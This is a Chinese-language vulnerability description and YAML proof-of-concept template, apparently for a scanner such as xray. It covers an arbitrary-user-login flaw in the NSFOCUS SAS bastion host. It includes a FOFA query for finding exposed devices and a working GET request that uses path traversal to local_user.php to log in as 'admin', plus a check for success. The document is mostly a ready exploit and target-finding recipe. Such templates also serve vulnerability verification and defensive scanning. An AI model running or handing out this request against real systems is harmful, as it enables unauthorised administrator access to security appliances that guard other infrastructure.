漏洞描述
绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录
FOFA: body="'/needUsbkey.php?username='"
nsfocus-sas-localuser-login-anyuser: 绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
PoC代码[已公开]
id: nsfocus-sas-localuser-login-anyuser
info:
name: 绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
author: peiqi
severity: high
verified: true
description: |
绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录
FOFA: body="'/needUsbkey.php?username='"
reference:
- https://peiqi.wgpsec.org/wiki/webapp/%E7%BB%BF%E7%9B%9F/%E7%BB%BF%E7%9B%9F%20SAS%E5%A0%A1%E5%9E%92%E6%9C%BA%20local_user.php%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
tags: nsfocus
created: 2023/08/10
rules:
r0:
request:
method: GET
path: /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
expression: response.status == 200 && response.body.bcontains(b'"status":200')
expression: r0()